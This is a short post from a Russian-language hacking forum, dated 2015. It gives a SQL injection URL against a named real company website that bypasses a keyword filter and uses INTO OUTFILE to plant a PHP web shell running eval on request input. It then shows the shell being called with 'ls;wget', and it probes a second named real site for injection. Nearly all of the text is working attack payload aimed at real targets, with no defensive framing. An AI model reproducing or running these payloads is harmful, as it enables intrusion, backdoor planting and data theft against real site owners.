28.06.2015, 12:54
|
|
Guest
Сообщений: n/a
Провел на форуме:
94006
Репутация:
24
|
|
Начнём с того, что у root есть права на запись и полный путь.
Фильтр стоял на операторе select, но я его обошёл. Выполняю запрос:
Код:
Code:
ttp://www.angloeasterngroup.com/careers/index.php?parentId=3&careerId=3%27+union+/*!select*/+1,2,3,4,%27%3C?php%20eval%28$_REQUEST[cmd]%29;%20?%3E%27,6,7,8,9,10+from+mysql.user+into+outfile+%27C:\xampp\htdocs\cms\shell.php%27+--+ - сброс соеденяния
http://www.angloeasterngroup.com/shell.php?cmd=ls;wget...
================================================== ============
SQL
После кавычки всё слешируется
Код:
Code:
http://gordonua.com/search.html?s[text]='
|
|
|
|